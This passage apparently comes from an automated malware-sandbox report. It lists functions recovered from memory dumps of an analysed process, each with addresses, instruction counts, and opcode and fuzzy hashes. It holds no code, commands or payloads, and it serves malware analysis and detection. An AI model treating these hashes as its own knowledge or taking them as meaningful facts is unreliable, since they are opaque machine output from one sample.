                                        • Instruction Fuzzy Hash: 05918C74A002059FCB25CF5DC494AAAFBB1FF89310F248699E815AB365C736FC51DBA0
                                        Function 045D7740 Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 425e3e7e41b12b751d10dc0286f0dedd8ab09ff567485939e6d0394009d4a4dd
                                        • Instruction ID: 90441626fdb4697c49f1a7c79be03d274e1ecf3a255b08deeaa8ef82dceb56e7
                                        • Opcode Fuzzy Hash: 425e3e7e41b12b751d10dc0286f0dedd8ab09ff567485939e6d0394009d4a4dd
                                        • Instruction Fuzzy Hash: 9D51A4357042059FD714DB79E844A6A7BEAFFCD215B1889BAD405CB351EB31EC01DBA0
                                        Function 045DBAC0 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75e2d136d1750ba8989db813f9f3a721946fd4d76ce580b52e7b87af334ebf7a
                                        • Instruction ID: 2e3f8d3fc6ba193d2dae63f9fce27fd5c2063cdbeec61509232af116935d792b
                                        • Opcode Fuzzy Hash: 75e2d136d1750ba8989db813f9f3a721946fd4d76ce580b52e7b87af334ebf7a
                                        • Instruction Fuzzy Hash: 46611971E012499FDB24CFA9D58479DBBF2FF88310F198129E819AB364EB74AD41CB50
                                        Function 045DBAB0 Relevance: .2, Instructions: 153COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21252fdd53f4ac2be18b5b795f9e9251657c28e8e502d4ce385957db952f1ae2
                                        • Instruction ID: 816b003e5f7c2cd16ff635a98bdaeef418e37363a19bb48040d3aa832a9fd6f8
                                        • Opcode Fuzzy Hash: 21252fdd53f4ac2be18b5b795f9e9251657c28e8e502d4ce385957db952f1ae2
                                        • Instruction Fuzzy Hash: 32513B71E012499FDB24CFA9D484B9DBBF2FF88310F198029E819AB364DB34AC45CB51
                                        Function 073E3CCC Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1426686624.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b68f8ee7b95b8023dde01f1c18ad4e07bb78dbeb577e715628e49810902fc7a
                                        • Instruction ID: 1b83ff2c4a1256b5bb8807b0fed042f848b00b4479ae44de69dafac426d5facc
                                        • Opcode Fuzzy Hash: 7b68f8ee7b95b8023dde01f1c18ad4e07bb78dbeb577e715628e49810902fc7a
                                        • Instruction Fuzzy Hash: 9141F7F2B11212DFEB258E14C501BAA7BBAAF81310F1480A9D9089F6D1D731ED45CBA1
                                        Function 045D6FE0 Relevance: .1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d947d8e89d88f7dc4bf034dfa74c048aa63996365842abb21bfd2e1f77614fe
                                        • Instruction ID: 282e73c8535b1b48c46dab29cac23cece621f9ea169124c9974c6225e7a0f25d
                                        • Opcode Fuzzy Hash: 3d947d8e89d88f7dc4bf034dfa74c048aa63996365842abb21bfd2e1f77614fe
                                        • Instruction Fuzzy Hash: EF414834B002048FDB24DFA9D558AAEBBF2FF8D311F144099E402AB391DB35AD41DB61
                                        Function 045D2B00 Relevance: .1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d918cd4311009d6109298824142b40bf27d85de275dcca6c8659070bfb2f55b
                                        • Instruction ID: aa1588481688554eabb158caaccb2793e5e640bafee38df984b141ea0dc6c9f4
                                        • Opcode Fuzzy Hash: 9d918cd4311009d6109298824142b40bf27d85de275dcca6c8659070bfb2f55b
                                        • Instruction Fuzzy Hash: D7415974A006059FDB25CF48C098AAAF7B1FF48310F218599E815AB364C736FC92DFA0
                                        Function 045DC388 Relevance: .1, Instructions: 101COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54d4c092f5bc44bdfc1cb05705a52eac37558c9e6a5750e5d39cf8b9493c0af9
                                        • Instruction ID: 187491d4cd06ac3fa7c3958ea4cbbe8d87238781036037b1930c0d19967be2c7
                                        • Opcode Fuzzy Hash: 54d4c092f5bc44bdfc1cb05705a52eac37558c9e6a5750e5d39cf8b9493c0af9
                                        • Instruction Fuzzy Hash: 23319C363012019FD715EB79E844B9EBB93FFC4255F048229D509CB354DB70AC06CBA2
                                        Function 045D6FD1 Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e17bf488cfd0a90f8903a22fad45d0be57a7caf4c806abc6cbcb098e1e36c5e2
                                        • Instruction ID: bbd10303d1c86d6a3b9530aa890213d17f8caf20a114d288e5330f602df12d05
                                        • Opcode Fuzzy Hash: e17bf488cfd0a90f8903a22fad45d0be57a7caf4c806abc6cbcb098e1e36c5e2
                                        • Instruction Fuzzy Hash: 5A313C34B042058FDB25DFA8D558AADBBF1AF8D315F1440A9E406AB391DB31EC41DF60
                                        Function 045DAE60 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d294086ae903caef4572e081adc0d304bee31175af9f36e6cf237162e08c2ed6
                                        • Instruction ID: 0e4bed787b2042a513aa0f99ddd67d5fe026b02cbdbc4e636a06219e201c63ed
                                        • Opcode Fuzzy Hash: d294086ae903caef4572e081adc0d304bee31175af9f36e6cf237162e08c2ed6
                                        • Instruction Fuzzy Hash: 9C316D74E0160A9BDB28DFB9D4947AEBBF7EFC8210F148069E405E7350EB349C419B91
                                        Function 045DAD28 Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3225b63366ff3b3fcede630fd1bea282c466ae34f1b53123f5b4d0f32d57e05
                                        • Instruction ID: ec4114e4892f93c55468a94147dc8da28535c1741512dcfadc68d6ba328a1159
                                        • Opcode Fuzzy Hash: c3225b63366ff3b3fcede630fd1bea282c466ae34f1b53123f5b4d0f32d57e05
                                        • Instruction Fuzzy Hash: 8431A1B4E002099FEB00DFA5D855ABE7BB3FF85300F15846ED510AB395DA39AD018FA1
                                        Function 045DE049 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33bee838b16477a9a19dae213b762e11283ef6e1eb5cb6979ea58958acd88c61
                                        • Instruction ID: 94bd6e5c13245a77a1b0d8ab38b3e701afabca65994a703b0465af8831f98b0f
                                        • Opcode Fuzzy Hash: 33bee838b16477a9a19dae213b762e11283ef6e1eb5cb6979ea58958acd88c61
                                        • Instruction Fuzzy Hash: D7313A75A006048FDB14DFA9D45869EBBF2FF89714F148069D806AB391DF34AC81CB91
                                        Function 045DAE70 Relevance: .1, Instructions: 84COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 186e051902b5be02ae5e76a4500a899d630c0939b3ae1c537e7651c43e6b6dd6
                                        • Instruction ID: e36228f1f6415b12be08128cf539a6b94bd6257ac1fe30ba49a4736339e9294b
                                        • Opcode Fuzzy Hash: 186e051902b5be02ae5e76a4500a899d630c0939b3ae1c537e7651c43e6b6dd6
                                        • Instruction Fuzzy Hash: A0314B74E0120A9BDB19DFB9D4947AEBAF7EFC8300F148069E405EB350EB349C419B51
                                        Function 045DAF98 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7355af7664d8c238e9bcd7e00d37283ac76e53e1e147ce3d8c8bdb79c74a66b8
                                        • Instruction ID: 8ca6d5272894cbcafddbd0219adb2809598c646b2024b3b3327831f26299711d
                                        • Opcode Fuzzy Hash: 7355af7664d8c238e9bcd7e00d37283ac76e53e1e147ce3d8c8bdb79c74a66b8
                                        • Instruction Fuzzy Hash: 3921B575E042498FDB24DFAED40079EBBF5EF89320F14846ED519E7340CB35A9058BA5
                                        Function 045D93F0 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7522037e78bcee227181c6b3cc8167196e22f6c3057774134984eb9dd8fb2af
                                        • Instruction ID: bf9579abb1e1a9adb624422a6663c612b4d880ebac110aa44f72670c7ba816f5
                                        • Opcode Fuzzy Hash: c7522037e78bcee227181c6b3cc8167196e22f6c3057774134984eb9dd8fb2af
                                        • Instruction Fuzzy Hash: 7A3189B59017449ADB60DF6AD4883DAFBE2FF88320F28C42ED85D97205DB7464818BA1
                                        Function 045DE058 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b0fef8095415b017d37438139b901440a4014e065652abbdaf80535d2e83dd3b
                                        • Instruction ID: 488b3fc152aad4848d2cc7683238d21980c7e8d3179a334ad6409aaeeb7f6a8c
                                        • Opcode Fuzzy Hash: b0fef8095415b017d37438139b901440a4014e065652abbdaf80535d2e83dd3b
                                        • Instruction Fuzzy Hash: 26312674A006048FDB14EFA9D458A9EBBF2FF88714F148469D406EB3A1DF34AC81CB91
                                        Function 045DAD38 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1007f1318ed380db207e3b5eaf9fc2ef8af65f82e3063df2b4ef315a53d5844c
                                        • Instruction ID: 8970837226b7233b11620ca66ce701db17c095d83ab59530dc6a42e5149f5854
                                        • Opcode Fuzzy Hash: 1007f1318ed380db207e3b5eaf9fc2ef8af65f82e3063df2b4ef315a53d5844c
                                        • Instruction Fuzzy Hash: 1F3180B4E002099FEB00EFA9D455ABE7BB3FF84300F14846DD510AB395DA39AD018FA0
                                        Function 044CF3D8 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375041661.00000000044CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044CD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cab8b7649c9a1f38e8cd8a2ec1af3a34aa210390a6b8a8ceb2f58cd8f7aeeec6
                                        • Instruction ID: 7d6d189718d50a146a3bf408674d613206e29e974be03e44de4c90cf6023560b
                                        • Opcode Fuzzy Hash: cab8b7649c9a1f38e8cd8a2ec1af3a34aa210390a6b8a8ceb2f58cd8f7aeeec6
                                        • Instruction Fuzzy Hash: 5C212679600200DFCF54CF10D9C1B16BB62EB94314F28C5AED9090A396C33AE45BCBA1
                                        Function 044CF02C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375041661.00000000044CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044CD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27dab7f0b6f03a5edbdf4fcb97f2b1c158de87e96d5568842004c52b8e83b9e2
                                        • Instruction ID: 04a134ed14ac47bcedcd49b9d05f051c593057122f5e0d1b15a958dce80f2119
                                        • Opcode Fuzzy Hash: 27dab7f0b6f03a5edbdf4fcb97f2b1c158de87e96d5568842004c52b8e83b9e2
                                        • Instruction Fuzzy Hash: CF21F879604240DFDF54DF14D9C4B16BB62EB84714F28C56EDA094B386C73AE44ACA61
                                        Function 045D9400 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b70a175693ab0573b2039d0779f9c58537937b341f82ad4803adddf49bae572
                                        • Instruction ID: 227b9ec106d61feec88219243a43dea09fa4b841a7a47d9f59b847efc8a2be4b
                                        • Opcode Fuzzy Hash: 7b70a175693ab0573b2039d0779f9c58537937b341f82ad4803adddf49bae572
                                        • Instruction Fuzzy Hash: 48214BB49017449EDB60CF6AD48878AFBF2FF88324F28C42ED85D97245DA7464818B61
                                        Function 045D767C Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 451470dfefdd5c36cebd9f68c4d2e2e719436e933b31a290fd6a511370398686
                                        • Instruction ID: e08bd764f067ed31a02b9814bf9c85934465f069b7a2f009e57691b6c2fcc9ef
                                        • Opcode Fuzzy Hash: 451470dfefdd5c36cebd9f68c4d2e2e719436e933b31a290fd6a511370398686
                                        • Instruction Fuzzy Hash: A2110A79B002188FDB14DBA9E944AED77F6FBCC215B0480A9E909DB311DA34EC12DB90
                                        Function 044CF3D3 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375041661.00000000044CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044CD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2af9c9ea477a083af87f96385403baa4e5001dbd8c9e6086a07978c3fca66d4
                                        • Instruction ID: a61310207272e6d365dc166f1ad413e1587ca9b73077d7c3c9b287243feb2aa5
                                        • Opcode Fuzzy Hash: a2af9c9ea477a083af87f96385403baa4e5001dbd8c9e6086a07978c3fca66d4
                                        • Instruction Fuzzy Hash: 4B216A7A504240DFCF06CF10D9C5B16BB62FB88314F28C5AED9494A696C33AD46ACB91
                                        Function 045DDD0F Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 512b9443e7bc67abf41433a37de1811964e9ce1ffb7eac9eb09511c5cb98d983
                                        • Instruction ID: 174de8064377b918ecbbde41e0aee65033081fb4588e0bd2d91fb11f511a4f96
                                        • Opcode Fuzzy Hash: 512b9443e7bc67abf41433a37de1811964e9ce1ffb7eac9eb09511c5cb98d983
                                        • Instruction Fuzzy Hash: 3A012D3670415467C725A66DA8004DDBBB6EFC6231714846FD40697341DE21BC0A93E1
                                        Function 044CF027 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375041661.00000000044CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044CD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 073f9d4294e47498f1a4ae26ac947c35cfee870b18bc956f8404a5c9a11bb111
                                        • Instruction ID: 04fb3ab5d29069e4d0cf2228bc757dca90741933edd3fc8b279c62970338a228
                                        • Opcode Fuzzy Hash: 073f9d4294e47498f1a4ae26ac947c35cfee870b18bc956f8404a5c9a11bb111
                                        • Instruction Fuzzy Hash: A3119079504280DFCB15CF14D5C4B16BF62FB44724F28C6AED9494B796C33AE44ACB51
                                        Function 045DBCE0 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fb3fbc0f705127e20ebcf9dd2fd62c00e111632cb0b85b012d4a84cdd47c606
                                        • Instruction ID: d940ca4395731b298e9dbf4a890de53773bef82bb8ae63999d9b89b0b73eb717
                                        • Opcode Fuzzy Hash: 2fb3fbc0f705127e20ebcf9dd2fd62c00e111632cb0b85b012d4a84cdd47c606
                                        • Instruction Fuzzy Hash: D001C0316093449FD724DB7AE494A997FE1BF46210B1484AED04AC76A2CB20FC85D700
                                        Function 045DDC98 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee3f1e5e9630cc9853ed925553badea9172a9430f562d30b8d5eb7dcc0987ce5
                                        • Instruction ID: cf2962eb9661fb47d2a1429183a5e324d43f0f70dee8eff05ca63be505a36175
                                        • Opcode Fuzzy Hash: ee3f1e5e9630cc9853ed925553badea9172a9430f562d30b8d5eb7dcc0987ce5
                                        • Instruction Fuzzy Hash: 90110534204750CFC729DF79D08489ABBF6EF8931572489ADD48A8BBA0CB32F845CB54
                                        Function 045DDF20 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f7d0926e847726f87f90f69400dfbb52220b098b3a721c0d3f7ff074f8fe669
                                        • Instruction ID: cbfa2cfb5836aec1bf61046153816b22f3bac80131c788b3e4fa24bb5df4beb0
                                        • Opcode Fuzzy Hash: 5f7d0926e847726f87f90f69400dfbb52220b098b3a721c0d3f7ff074f8fe669
                                        • Instruction Fuzzy Hash: AA0192357012188FCB119F78E808AAEBBF6FF89315F104069E50AD3341DB359D01CB91
                                        Function 044CD01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375041661.00000000044CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044CD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93c06574169f6606aa095c6c5049712c61fca141f4bc8ac43e89b870a266954a
                                        • Instruction ID: 23cfe8a9dc4474232282cc16b6e284879db4b7cd51598e79be9cd6a25770a97d
                                        • Opcode Fuzzy Hash: 93c06574169f6606aa095c6c5049712c61fca141f4bc8ac43e89b870a266954a
                                        • Instruction Fuzzy Hash: 3001FC759043409AEB604E1ADC84767BF88DF41329F0CC03FDC481B242C674A846CAB2
                                        Function 045DBF10 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 459136566039a01d3175c682d45b93d0a767ed61aaab7e10bdaab82598d4543a
                                        • Instruction ID: 44817756b8500a84778c9e3202b71a883ca88aec0148fa7b355e7596df7d22db
                                        • Opcode Fuzzy Hash: 459136566039a01d3175c682d45b93d0a767ed61aaab7e10bdaab82598d4543a
                                        • Instruction Fuzzy Hash: 76F0D1227093912FD7018A699C40967BFEDDF8661170440ABF880C7252CA60C9008760
                                        Function 044CD005 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375041661.00000000044CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044CD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70f4d4010bfc18ba41338d0cfd75fbbb470edba94c9862981411457f30d9e11b
                                        • Instruction ID: b4b3428870d71836a3ea4aef76a30db5d72f42039a3158d7d951ddc7ad66ded2
                                        • Opcode Fuzzy Hash: 70f4d4010bfc18ba41338d0cfd75fbbb470edba94c9862981411457f30d9e11b
                                        • Instruction Fuzzy Hash: CF01406140D3C09FD7128B259C94B52BFA4DF43224F1DC1EFD8888F293C2699848C772
                                        Function 045D90D8 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a99df3e73b5bab07e0a5677b57ad799b485e2cab3b92db925159c76f6b24e99
                                        • Instruction ID: 37443f312b07fd18ff9dc5d3e5757f35965fb94a545caebd54a12d35dfb9c8d0
                                        • Opcode Fuzzy Hash: 6a99df3e73b5bab07e0a5677b57ad799b485e2cab3b92db925159c76f6b24e99
                                        • Instruction Fuzzy Hash: 5FF028796082445BD3116B7990083EB7F66EFC6318F38819BC54647346CE352C06C7E0
                                        Function 045D7958 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d38771cf3d171c73c16f43db80368d96944263d4a2bcf683a98b97122bc0a4dd
                                        • Instruction ID: d8c70fbadef5f5f72b489927335728106112fd0b27f316e67d074a1dae293b33
                                        • Opcode Fuzzy Hash: d38771cf3d171c73c16f43db80368d96944263d4a2bcf683a98b97122bc0a4dd
                                        • Instruction Fuzzy Hash: CDF0F6356063415FC7129769EC8496F7BE9EFC9225B04055EE049CB651DE34AC45C3B1
                                        Function 045DDEC1 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8438f051104e13090dc9a856056343d26abfd4331fcf83bfe7570aa119a67d7d
                                        • Instruction ID: 65b141004332f7355fbaef634c0fbe78f4a07863f3b81f41b6d63f547958e306
                                        • Opcode Fuzzy Hash: 8438f051104e13090dc9a856056343d26abfd4331fcf83bfe7570aa119a67d7d
                                        • Instruction Fuzzy Hash: E0F05E353042814FC3119B2DE454965FFFAEFCBA1932900DAE585DF762CA60EC56D750
                                        Function 044CD423 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375041661.00000000044CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044CD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe29872e725d31bc6e4238597e1d0a508ce8a872ae2984d109bbb73c5b8c507e
                                        • Instruction ID: da5387c263149052f612f65ce81d3bee6942769219bf1055005163316b0a40bb
                                        • Opcode Fuzzy Hash: fe29872e725d31bc6e4238597e1d0a508ce8a872ae2984d109bbb73c5b8c507e
                                        • Instruction Fuzzy Hash: 1EF0F9B6600600AF97608F0ADD85C23FBA9EFD4770319C56AED4A4B716C671FC42CEA1
                                        Function 045D9158 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5647f7e6081d75129ef8b39cdca9ce5370e8f46d6a429d41c98f98f370b8ac13
                                        • Instruction ID: b03aa0c42ac9ee7cb182dc69addcd54d11af1ea085e90aef81dc692eb7dc8e90
                                        • Opcode Fuzzy Hash: 5647f7e6081d75129ef8b39cdca9ce5370e8f46d6a429d41c98f98f370b8ac13
                                        • Instruction Fuzzy Hash: 65F0B4715053444FD7608B78D8A83D6BFE5FF05324F14445AD14AD7242DB346C81C791
                                        Function 045DDD60 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0bb29da41ff7b8c38bc0e076bf745b2290b0e783413dd60aae2f8a465ca7ef8
                                        • Instruction ID: 43be5685f05d21bdb9f86e191fd6f225b9601db426cd7c0b1c1b70de9e23e18e
                                        • Opcode Fuzzy Hash: f0bb29da41ff7b8c38bc0e076bf745b2290b0e783413dd60aae2f8a465ca7ef8
                                        • Instruction Fuzzy Hash: E2F0EC33704184A7CB25966DA9414DCFF75FFC9225B24446AD447A7342DB31741BE3D1
                                        Function 044CD414 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375041661.00000000044CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 044CD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4e6ed37e2cbcfdb5b98de7ee41f59bc5c47cf41b354c582c0e0a7e79ca9cc21
                                        • Instruction ID: 7db1323d2e10afcee8b3fe5af06901372feb46ba2b8b8bbe84f636cb0cf8c5c3
                                        • Opcode Fuzzy Hash: a4e6ed37e2cbcfdb5b98de7ee41f59bc5c47cf41b354c582c0e0a7e79ca9cc21
                                        • Instruction Fuzzy Hash: 72F037BA500A40AFD7208F06CD85D23BBA9EBC5620B19C499E84A4B312C631FC42CF61
                                        Function 045D8969 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1671bb2ca4d872a19289bb623310d53cc1831bacc7772bebce017bb721081512
                                        • Instruction ID: 0eceaa84827bae57b8965231163d456a34b50eebc70d4d197445ec05023a5059
                                        • Opcode Fuzzy Hash: 1671bb2ca4d872a19289bb623310d53cc1831bacc7772bebce017bb721081512
                                        • Instruction Fuzzy Hash: B6F0273A30D3944BC7062775681C2ED3F53AFC6638F0841ABD90587382CF294D0583E5
                                        Function 045D7968 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd991492667d43ba3bdbeb9fe851706687c3816cd4f3f003ae129acbc1bb8272
                                        • Instruction ID: f6809ad845cc922cd3230a980702850efd09e130a0c825016443c75aa1113786
